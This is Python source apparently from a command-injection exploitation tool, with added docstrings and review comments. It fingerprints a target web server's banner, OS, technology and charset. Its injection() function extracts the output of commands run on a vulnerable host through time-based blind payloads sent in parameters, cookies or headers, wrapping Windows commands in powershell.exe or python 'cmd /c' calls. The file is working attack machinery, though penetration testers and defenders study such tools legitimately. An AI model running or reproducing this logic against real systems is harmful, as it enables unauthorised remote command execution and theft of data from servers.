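def server_identification(server_banner):
  """Match the target's Server banner against settings.SERVER_BANNERS.

  On the first match, stores the matched substring in settings.SERVER_BANNER
  and sets settings.WEB_ROOT to a default document root for Apache, nginx or
  Microsoft IIS. When nothing matches, prints a single warning.

  Args:
    server_banner: the Server header value as received from the target. It
      is target-controlled and is concatenated into terminal output as-is;
      whether the settings.print_* helpers escape it is not visible here.
  """
  found_server_banner = False
  if settings.VERBOSITY_LEVEL != 0:
    debug_msg = "Identifying the target server. "
    sys.stdout.write(settings.print_debug_msg(debug_msg))
    sys.stdout.flush()

  lowered_banner = server_banner.lower()
  for banner_pattern in settings.SERVER_BANNERS:
    # SERVER_BANNERS entries are applied as regular expressions, not literals.
    match = re.search(banner_pattern.lower(), lowered_banner)
    if not match:
      continue
    if settings.VERBOSITY_LEVEL != 0:
      print(settings.SPACE)
      debug_msg = "The target server identified as "
      debug_msg += server_banner + Style.RESET_ALL + "."
      print(settings.print_bold_debug_msg(debug_msg))
    settings.SERVER_BANNER = match.group(0)
    found_server_banner = True
    # Set up default root paths
    matched = settings.SERVER_BANNER.lower()
    if "apache" in matched:
      if settings.TARGET_OS == "win":
        settings.WEB_ROOT = "\\htdocs"
      else:
        settings.WEB_ROOT = "/var/www"
    elif "nginx" in matched:
      settings.WEB_ROOT = "/usr/share/nginx"
    elif "microsoft-iis" in matched:
      settings.WEB_ROOT = "\\inetpub\\wwwroot"
    break

  # The flag drives the warning explicitly, so it fires exactly once, after
  # the loop, and cannot be read as the `else` of the per-pattern `if match`
  # (which would warn once for every pattern tried before the matching one).
  if not found_server_banner:
    if settings.VERBOSITY_LEVEL != 0:
      print(settings.SPACE)
    warn_msg = "The server which identified as '"
    warn_msg += server_banner + "' seems unknown."
    print(settings.print_warning_msg(warn_msg))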
def application_identification(url):
  """Guess the target application from the file extension of the URL path.

  Stores the upper-cased extension (without its dot) in
  settings.TARGET_APPLICATION. With an extension present it is reported when
  verbose and, if it appears in settings.UNSUPPORTED_TARGET_APPLICATION, the
  run is aborted with SystemExit. Without one, a warning is printed.
  """
  if settings.VERBOSITY_LEVEL != 0:
    debug_msg = "Identifying the target application."
    sys.stdout.write(settings.print_debug_msg(debug_msg))
    sys.stdout.flush()

  _, extension = splitext(_urllib.parse.urlparse(url).path)
  settings.TARGET_APPLICATION = extension[1:].upper()

  if not settings.TARGET_APPLICATION:
    if settings.VERBOSITY_LEVEL != 0:
      print(settings.SPACE)
    warn_msg = "Heuristics have failed to identify target application."
    print(settings.print_warning_msg(warn_msg))
    return

  if settings.VERBOSITY_LEVEL != 0:
    print(settings.SPACE)
    debug_msg = "The target application identified as "
    debug_msg += settings.TARGET_APPLICATION + Style.RESET_ALL + "."
    print(settings.print_bold_debug_msg(debug_msg))

  # Check for unsupported target applications: a case-insensitive substring
  # test against every entry, not an exact comparison.
  needle = settings.TARGET_APPLICATION.lower()
  for unsupported in settings.UNSUPPORTED_TARGET_APPLICATION:
    if needle in unsupported.lower():
      err_msg = settings.TARGET_APPLICATION + " exploitation is not yet supported."
      print(settings.print_critical_msg(err_msg))
      raise SystemExit()
def technology_detection(response):
  """Report the target's X-Powered-By header when running verbosely.

  Reads the header from response.info(); nothing is stored in settings. At
  settings.VERBOSITY_LEVEL == 0 the header is still read but nothing is printed.
  The header value is target-controlled and is concatenated into the terminal
  output unchanged.
  """
  verbose = settings.VERBOSITY_LEVEL != 0
  if verbose:
    debug_msg = "Identifying the technology supporting the target application. "
    sys.stdout.write(settings.print_debug_msg(debug_msg))
    sys.stdout.flush()
    print(settings.SPACE)

  powered_by = response.info()['X-Powered-By']
  if not verbose:
    return

  if powered_by:
    debug_msg = "The target application is powered by "
    debug_msg += powered_by + Style.RESET_ALL + "."
    print(settings.print_bold_debug_msg(debug_msg))
  else:
    warn_msg = "Heuristics have failed to identify the technology supporting the target application."
    print(settings.print_warning_msg(warn_msg))
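def encoding_detection(response):
  """Best-effort detection of the charset the target page advertises.

  Skipped entirely when the user forced one via menu.options.encoding.
  Looks first at the Content-Type charset parameter (Python 2 getparam,
  Python 3 get_content_charset), then for a ``charset="..."`` attribute in
  the response body. A detected value is stored in
  settings.DEFAULT_PAGE_ENCODING and, when verbose, a warning is printed if
  it is not in settings.ENCODING_LIST; a warning is also printed when nothing
  was found.

  The charset is target-controlled and is stored verbatim even when it is
  not in ENCODING_LIST, so consumers of DEFAULT_PAGE_ENCODING must tolerate an
  unknown codec name. The body lookup consumes response.read().
  """
  if menu.options.encoding:
    return

  charset_detected = False
  if settings.VERBOSITY_LEVEL != 0:
    debug_msg = "Identifying the indicated web-page charset. "
    sys.stdout.write(settings.print_debug_msg(debug_msg))
    sys.stdout.flush()

  try:
    # Detecting charset: the header first.
    try:
      # Support for python 2.7.x
      charset = response.headers.getparam('charset')
    except AttributeError:
      # Support for python 3.x
      charset = response.headers.get_content_charset()

    if not charset:
      # Body fallback. The previous version read the body twice; the second
      # read() of a consumed response is empty, so its HTML5 branch could never
      # match. Read once, and use the non-greedy form so that
      # charset="utf-8"><link href="x"> yields utf-8 instead of the rest of the line.
      body = response.read()
      if isinstance(body, bytes):
        # A str pattern on bytes raises TypeError under Python 3 (previously
        # swallowed, so the fallback never ran). The attribute is ASCII, so a
        # lossy decode is sufficient to locate it.
        body = body.decode("ascii", "ignore")
      found = re.findall(r"charset=['\"](.*?)['\"]", body)
      charset = found[0] if found else None

    # Check the identified charset
    if charset:
      charset_detected = True
      settings.DEFAULT_PAGE_ENCODING = charset
      if settings.VERBOSITY_LEVEL != 0:
        print(settings.SPACE)
        if settings.DEFAULT_PAGE_ENCODING.lower() not in settings.ENCODING_LIST:
          warn_msg = "The indicated web-page charset " + settings.DEFAULT_PAGE_ENCODING + " seems unknown."
          print(settings.print_warning_msg(warn_msg))
        else:
          debug_msg = "The indicated web-page charset appears to be "
          debug_msg += settings.DEFAULT_PAGE_ENCODING + Style.RESET_ALL + "."
          print(settings.print_bold_debug_msg(debug_msg))
  except Exception:
    # Best-effort heuristic: any failure means "not detected" and is reported
    # by the warning below. Narrowed from a bare except so KeyboardInterrupt
    # and SystemExit are no longer swallowed.
    pass

  if not charset_detected and settings.VERBOSITY_LEVEL != 0:
    print(settings.SPACE)
    warn_msg = "Heuristics have failed to identify indicated web-page charset."
    print(settings.print_warning_msg(warn_msg))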
def injection(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, alter_shell, filename, url_time_response):
  """Time-based blind retrieval of a command's output, one position at a time.

  Phase 1 determines the output length: one timing payload per candidate
  length in range(minlen, maxlen), stopping at the first whose measured
  delay satisfies settings.FOUND_HOW_LONG / settings.FOUND_DIFF. Phase 2
  then walks positions 1..length and, for each, tries every candidate from
  checks.generate_char_pool() until a delay confirms it.

  Args:
    separator: command separator forwarded to tb_payloads.
    maxlen: exclusive upper bound on the output length probed in phase 1.
    TAG: not referenced in this body.
    cmd: command whose output is retrieved. On Windows it is wrapped in a
      length-measuring command for phase 1 and restored for phase 2.
    prefix, suffix: forwarded to parameters.prefixes() / parameters.suffixes().
    whitespace: replaces every space character in each payload.
    timesec: delay value forwarded to tb_payloads and subtracted from the
      measured response time when judging a hit.
    http_request_method, url, vuln_parameter, url_time_response: forwarded to
      the request helpers (cookie_injection_test, ..., examine_requests).
    alter_shell: selects the *_alter_shell payload builders.
    filename: not referenced in this body.

  Returns:
    (check_how_long, output): whole seconds spent in phase 2 and the retrieved
    string (empty when it consisted only of spaces); (0, False) when phase 1
    found no length.
  """
  if settings.TARGET_OS == "win":
    # Keep the raw command for phase 2; phase 1 on Windows measures the
    # length of its output via the wrapper chosen below.
    previous_cmd = cmd
    if alter_shell:
      cmd = settings.WIN_PYTHON_DIR + " -c \"import os; print len(os.popen('cmd /c " + cmd + "').read().strip())\""
    else:
      cmd = "powershell.exe -InputFormat none write-host ([string](cmd /c " + cmd + ")).trim().length"

  # File write/upload may legitimately produce empty output, so length 0 is probed too.
  if menu.options.file_write or menu.options.file_upload:
    minlen = 0
  else:
    minlen = 1

  found_chars = False
  info_msg = "Retrieving the length of execution output. "
  sys.stdout.write(settings.print_info_msg(info_msg))
  sys.stdout.flush()
  if settings.VERBOSITY_LEVEL > 1:
    print("")

  # ---- Phase 1: output length -------------------------------------------
  for output_length in range(int(minlen), int(maxlen)):
    if alter_shell:
      # Execute shell commands on vulnerable host.
      payload = tb_payloads.cmd_execution_alter_shell(separator, cmd, output_length, timesec, http_request_method)
    else:
      # Execute shell commands on vulnerable host.
      payload = tb_payloads.cmd_execution(separator, cmd, output_length, timesec, http_request_method)

    # Fix prefixes / suffixes
    payload = parameters.prefixes(payload, prefix)
    payload = parameters.suffixes(payload, suffix)

    # Whitespace fixation
    payload = payload.replace(" ", whitespace)

    # Perform payload modification
    payload = checks.perform_payload_modification(payload)

    # Check if defined "--verbose" option.
    if settings.VERBOSITY_LEVEL == 1:
      payload_msg = payload.replace("\n", "\\n")
      sys.stdout.write("\n" + settings.print_payload(payload_msg))
    # Check if defined "--verbose" option.
    elif settings.VERBOSITY_LEVEL >= 2:
      debug_msg = "Generating payload for the injection."
      print(settings.print_debug_msg(debug_msg))
      payload_msg = payload.replace("\n", "\\n")
      sys.stdout.write(settings.print_payload(payload_msg) + "\n")

    # Dispatch on where the INJECT_HERE tag was placed; each helper returns the
    # measured response time (how_long).
    # Check if defined cookie with "INJECT_HERE" tag
    if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
      how_long = cookie_injection_test(url, vuln_parameter, payload)
    # Check if defined user-agent with "INJECT_HERE" tag
    elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
      how_long = user_agent_injection_test(url, vuln_parameter, payload)
    # Check if defined referer with "INJECT_HERE" tag
    elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
      how_long = referer_injection_test(url, vuln_parameter, payload)
    # Check if defined host with "INJECT_HERE" tag
    elif menu.options.host and settings.INJECT_TAG in menu.options.host:
      how_long = host_injection_test(url, vuln_parameter, payload)
    # Check if defined custom header with "INJECT_HERE" tag
    elif settings.CUSTOM_HEADER_INJECTION:
      how_long = custom_header_injection_test(url, vuln_parameter, payload)
    else:
      how_long = examine_requests(payload, vuln_parameter, http_request_method, url, timesec, url_time_response)

    # Examine time-responses: both an absolute and a timesec-relative threshold must hold.
    injection_check = False
    if (how_long >= settings.FOUND_HOW_LONG and how_long - timesec >= settings.FOUND_DIFF):
      injection_check = True

    if injection_check == True:
      if output_length > 1:
        if settings.VERBOSITY_LEVEL >= 1:
          pass
        else:
          sys.stdout.write(settings.SUCCESS_STATUS + "\n")
          sys.stdout.flush()
        if settings.VERBOSITY_LEVEL == 1:
          print("")
        if settings.VERBOSITY_LEVEL >= 1:
          debug_msg = "Retrieved the length of execution output: " + str(output_length)
          print(settings.print_bold_debug_msg(debug_msg))
        else:
          sub_content = "Retrieved: " + str(output_length)
          print(settings.print_sub_content(sub_content))
      found_chars = True
      injection_check = False
      break

  # Proceed with the next (injection) step!
  # ---- Phase 2: one position at a time -----------------------------------
  if found_chars == True :
    if settings.TARGET_OS == "win":
      cmd = previous_cmd
    # range() below evaluates this bound once, before the loop variable of
    # the same name shadows it.
    num_of_chars = output_length + 1
    check_start = 0
    check_end = 0
    check_start = time.time()
    output = []
    percent = "0.0%"
    info_msg = "Presuming the execution output."
    if menu.options.verbose < 1 :
      info_msg += ".. (" + str(percent) + ")"
    elif menu.options.verbose == 1 :
      info_msg += ""
    else:
      info_msg += "\n"
    sys.stdout.write("\r" + settings.print_info_msg(info_msg))
    sys.stdout.flush()
    for num_of_chars in range(1, int(num_of_chars)):
      char_pool = checks.generate_char_pool(num_of_chars)
      for ascii_char in char_pool:
        if alter_shell:
          # Get the execution output, of shell execution.
          payload = tb_payloads.get_char_alter_shell(separator, cmd, num_of_chars, ascii_char, timesec, http_request_method)
        else:
          # Get the execution output, of shell execution.
          payload = tb_payloads.get_char(separator, cmd, num_of_chars, ascii_char, timesec, http_request_method)

        # Fix prefixes / suffixes
        payload = parameters.prefixes(payload, prefix)
        payload = parameters.suffixes(payload, suffix)

        # Whitespace fixation
        payload = payload.replace(" ", whitespace)

        # Perform payload modification
        payload = checks.perform_payload_modification(payload)

        # Check if defined "--verbose" option.
        if settings.VERBOSITY_LEVEL == 1:
          payload_msg = payload.replace("\n", "\\n")
          sys.stdout.write("\n" + settings.print_payload(payload_msg))
        # Check if defined "--verbose" option.
        elif settings.VERBOSITY_LEVEL >= 2:
          debug_msg = "Generating payload for the injection."
          print(settings.print_debug_msg(debug_msg))
          payload_msg = payload.replace("\n", "\\n")
          sys.stdout.write(settings.print_payload(payload_msg) + "\n")

        # Same dispatch as in phase 1.
        # Check if defined cookie with "INJECT_HERE" tag
        if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
          how_long = cookie_injection_test(url, vuln_parameter, payload)
        # Check if defined user-agent with "INJECT_HERE" tag
        elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
          how_long = user_agent_injection_test(url, vuln_parameter, payload)
        # Check if defined referer with "INJECT_HERE" tag
        elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
          how_long = referer_injection_test(url, vuln_parameter, payload)
        # Check if defined host with "INJECT_HERE" tag
        elif menu.options.host and settings.INJECT_TAG in menu.options.host:
          how_long = host_injection_test(url, vuln_parameter, payload)
        # Check if defined custom header with "INJECT_HERE" tag
        elif settings.CUSTOM_HEADER_INJECTION:
          how_long = custom_header_injection_test(url, vuln_parameter, payload)
        else:
          how_long = examine_requests(payload, vuln_parameter, http_request_method, url, timesec, url_time_response)

        # Examine time-responses
        injection_check = False
        if (how_long >= settings.FOUND_HOW_LONG and how_long - timesec >= settings.FOUND_DIFF):
          injection_check = True

        if injection_check == True:
          if settings.VERBOSITY_LEVEL == 0:
            output.append(chr(ascii_char))
            # percent == 100 only at the last position (num_of_chars == output_length);
            # under Python 3 this is true division, under Python 2 integer division.
            percent = ((num_of_chars*100)/output_length)
            float_percent = str("{0:.1f}".format(round(((num_of_chars * 100)/(output_length * 1.0)),2))) + "%"
            if percent == 100:
              float_percent = settings.SUCCESS_MSG
            else:
              float_percent = ".. (" + str(float_percent) + ")"
            info_msg = "Presuming the execution output."
            info_msg += float_percent
            sys.stdout.write("\r" + settings.print_info_msg(info_msg))
            sys.stdout.flush()
          else:
            output.append(chr(ascii_char))
          injection_check = False
          # First confirmed candidate wins; move to the next position.
          break

    check_end = time.time()
    check_how_long = int(check_end - check_start)
    output = "".join(str(p) for p in output)
    # Check for empty output.
    if output == (len(output) * " "):
      output = ""
  else:
    # Phase 1 found no length: report failure and return (0, False).
    check_start = 0
    if settings.VERBOSITY_LEVEL == 0:
      sys.stdout.write(settings.FAIL_STATUS)
      sys.stdout.flush()
    else:
      pass
    check_how_long = 0
    output = False

  if settings.VERBOSITY_LEVEL >= 1 and menu.options.ignore_session:
    print("")
  return check_how_long, output
def check_target_os(server_banner):
  """Identify the target operating system from the Server banner and reconcile it with --os.

  Matches server_banner against settings.SERVER_OS_BANNERS (used as regular
  expressions). On a hit, settings.TARGET_OS becomes "win" when the matched
  text matches "microsoft|win" (and --shellshock is refused), otherwise it
  keeps the matched text and is reported as Unix-like. When nothing matches
  and --os was not given: with --batch the run alternates between unix-based
  and windows-based payloads via settings.CHECK_BOTH_OS; otherwise the user is
  prompted. When verbose, the outcome is printed either way.

  Args:
    server_banner: the Server header value as received from the target
      (target-controlled; concatenated into terminal output unchanged).
  """
  found_os_server = False
  # NOTE(review): user_defined_os is only bound when checks.user_defined_os()
  # is true, but it is read below whenever menu.options.os is set. Presumably
  # those two conditions coincide — confirm, otherwise this is a NameError.
  if menu.options.os and checks.user_defined_os():
    user_defined_os = settings.TARGET_OS
  if settings.VERBOSITY_LEVEL != 0:
    debug_msg = "Identifying the target operating system. "
    sys.stdout.write(settings.print_debug_msg(debug_msg))
    sys.stdout.flush()

  # Procedure for target OS identification.
  for i in range(0,len(settings.SERVER_OS_BANNERS)):
    match = re.search(settings.SERVER_OS_BANNERS[i].lower(), server_banner.lower())
    if match:
      found_os_server = True
      settings.TARGET_OS = match.group(0)
      match = re.search(r"microsoft|win", settings.TARGET_OS)
      if match:
        identified_os = "Windows"
        if menu.options.os and user_defined_os != "win":
          # NOTE(review): this override is replaced by "win" two lines down;
          # presumably checks.identified_os() itself resolves the disagreement
          # (e.g. by prompting or exiting) — confirm.
          if not checks.identified_os():
            settings.TARGET_OS = user_defined_os
        settings.TARGET_OS = identified_os[:3].lower()
        if menu.options.shellshock:
          err_msg = "The shellshock module is not available for "
          err_msg += identified_os + " targets."
          print(settings.print_critical_msg(err_msg))
          raise SystemExit()
      else:
        identified_os = "Unix-like (" + settings.TARGET_OS + ")"
        if menu.options.os and user_defined_os == "win":
          if not checks.identified_os():
            settings.TARGET_OS = user_defined_os

  if settings.VERBOSITY_LEVEL != 0 :
    if found_os_server:
      print(settings.SPACE)
      debug_msg = "The target operating system appears to be "
      debug_msg += identified_os.title() + Style.RESET_ALL + "."
      print(settings.print_bold_debug_msg(debug_msg))
    else:
      print(settings.SPACE)
      warn_msg = "Heuristics have failed to identify server's operating system."
      print(settings.print_warning_msg(warn_msg))

  if found_os_server == False and not menu.options.os:
    # If "--shellshock" option is provided then,
    # by default is a Linux/Unix operating system.
    if menu.options.shellshock:
      pass
    else:
      if menu.options.batch:
        # Non-interactive: first pass keeps the current (unix) target and
        # arms CHECK_BOTH_OS; the second pass switches to "win" and disarms it.
        if not settings.CHECK_BOTH_OS:
          settings.CHECK_BOTH_OS = True
          check_type = "unix-based"
        elif settings.CHECK_BOTH_OS:
          settings.TARGET_OS = "win"
          settings.CHECK_BOTH_OS = False
          settings.PERFORM_BASIC_SCANS = True
          check_type = "windows-based"
        info_msg = "Setting the " + check_type + " payloads."
        print(settings.print_info_msg(info_msg))
      else:
        # Interactive: loop until a valid answer; "u" leaves TARGET_OS unchanged.
        while True:
          question_msg = "Do you recognise the server's operating system? "
          question_msg += "[(W)indows/(U)nix/(q)uit] > "
          got_os = _input(settings.print_question_msg(question_msg))
          if got_os.lower() in settings.CHOICE_OS :
            if got_os.lower() == "w":
              settings.TARGET_OS = "win"
              break
            elif got_os.lower() == "u":
              break
            elif got_os.lower() == "q":
              raise SystemExit()
          else:
            err_msg = "'" + got_os + "' is not a valid answer."
            print(settings.print_error_msg(err_msg))
            pass
def total_of_requests():
  """Print, as a bold debug line, how many HTTP(S) requests the injection point cost.

  The count comes from settings.TOTAL_OF_REQUESTS; nothing is returned.
  """
  count = str(settings.TOTAL_OF_REQUESTS)
  message = "Identified the following injection point with a total of " + count + " HTTP(S) requests."
  print(settings.print_bold_debug_msg(message))